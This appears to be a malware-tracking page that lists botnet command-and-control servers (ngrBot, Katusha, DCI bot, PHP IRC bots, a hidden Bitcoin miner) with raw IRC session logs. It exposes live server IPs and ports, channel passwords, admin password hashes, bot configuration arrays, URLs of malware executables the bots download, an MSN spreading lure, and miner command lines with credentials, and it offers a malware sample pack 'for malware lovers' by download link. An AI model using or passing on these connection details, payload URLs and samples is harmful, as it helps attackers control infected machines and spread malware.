92.241.165.134(ngrBot hosted in Russian Federation Oao Webalta)

Remote Host Port Number 200.122.132.122 80 213.251.170.52 80 81.169.145.73 80 92.241.165.134 7654 PASS ngrBot NICK n{US|XPa}bbvvotv USER bbvvotv 0 0 :bbvvotv JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://coopeande5.com/imagenes/principal.jpg.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 10 domain(s) UPDATE: PRIVMSG #oldgold :[DNS]: Blocked

Packed.Win32.Katusha(malware hosted in Netherlands Amsterdam Nforce Entertainment B.v)

dq.javagames7.com Resolved : [ dq.javagames7.com ] To [ 109.201.135.61 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.60 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.62 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.63 ] – TCP Connection Attempts: 109.201.135.63:8800 109.201.135.61:8800 109.201.135.62:8800 109.201.135.60:8800 exe file: http://31.184.237.180/dqs.exe hosting infos: http://whois.domaintools.com/109.201.135.63

92.243.4.133(modified DCI bot hosted in France Gandi)

3 websites use this address. (examples: btcminers.biz labekaa.com xety.fr) Remote Host Port Number 92.243.4.133 5900 PASS Virus channel #3new# NICK VirUs-ymurahxw USER VirUs “” “gyf” : 8Coded 8VirUs.. NICK VirUs-urxuktmo USER VirUs “” “gux” : hosting infos: http://whois.domaintools.com/92.243.4.133

46.20.40.193(ngrBot hosted in Germany Myloc Managed It Ag)

Remote Host Port Number 213.251.170.52 80 46.20.40.193 1337 PASS ngrBot NICK n{US|XPa}lqosuhk USER lqosuhk 0 0 :lqosuhk JOIN #ngr ngrBot PONG :Astros.GoV Now talking in #ngr Topic On : [ #ngr ] [ !mod pdef on ] Topic By : [ Astros ] hosting infos: http://whois.domaintools.com/46.20.40.193

40mb malware samples

Here again with another package for malware lovers most of them are baking trojans passwords stealers and irc bots Download: http://adf.ly/2CVhM

b.mobinil.biz(Silent BitCoin GPU Miner using Phoenix Miner)

http://b.mobinil.biz:8332/ cgminer.exe -o http://b.mobinil.biz:8332/ -u redem_g -p redemxxxxxxx -I 6 mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2 mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2 Resolved : [ b.mobinil.biz ] To [ 46.4.123.12 ] Resolved : [ b.mobinil.biz ] To [ 108.60.208.157 ] Resolved

115.239.230.68(ngrBot hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number 115.239.230.68 5101 PASS hax0r 203.17.62.187 80 213.251.170.52 80 31.184.237.82 80 64.111.199.221 80 66.45.56.124 80 67.225.165.214 80 70.38.98.236 80 70.38.98.239 80 PASS hax0r..KCIK n{US|XPa}ncfvgh k..RSSR ncfvghk 0 0 :ncfvghk..SE ND #ngme ng00.. PRIVMSG #ngme :[d=”http://31.184.237.82/ms02.exe” s=”100352 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #ngme :[d=”http://31.184.237.82/ppbnt.exe” s=”61440 bytes”]

77.235.47.132(ngrBot hosted in Netherlands Amsterdam Eurovps)

Remote Host Port Number 195.122.131.12 80 213.251.170.52 80 77.235.47.132 4042 PASS ngrBot PRIVMSG #boss :[d=”http://rapidshare.com/files/4007909942/shedontlikemeshelikemycar.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}psbuhdn USER psbuhdn 0 0 :psbuhdn JOIN #boss ngrBot PRIVMSG #boss :[MSN]: Updated MSN spread interval to “3” PRIVMSG #boss :[MSN]: Updated MSN spread message to “haha! http://goo.gl/LVZjX?img=facebook_photoalbum_24_07_2011_jpeg” The data identified by the following URLs

irc.swag.net(around 1.5k bots hosted in Germany Netdirect)

server: 178.162.234.177:6667 channel: #nix heckers inside the botnet: var $admins = array ( ‘LiGHTzz’ => ‘e48e13207341b6bffb7fb1622282247b’, ‘cmd’ => ‘e48e13207341b6bffb7fb1622282247b’, ‘broken’ => ‘e48e13207341b6bffb7fb1622282247b’, Operators : 10 operator(s) online Channels : 14 channels formed Clients : I have 131 clients and 1 servers Local users : Current Local Users: 131 Max: 1574 Global users : Current Global

50.31.0.109(1k linux bots hosted in United States Chicago Steadfast Networks)

var $config = array(“server”=>”50.31.0.109”, “port”=>”8080”, “pass”=>””, “prefix”=>”tibia|”, “maxrand”=>”4”, “chan”=>”#tibia2”, “chan2″=>”#tibia”, “key”=>”puto”, “modes”=>”+p”, “password”=>”lol321”, “trigger”=>”.”, “hostauth”=>”*” // Invisible Users : 2 Channels : 1 channels formed Clients : I have 148 clients and 0 servers Local users : Current local users: 148 Max: 1000 Global users : Current global users: 148 Max: 1000 hosting infos: http://whois.domaintools.com/50.31.0.109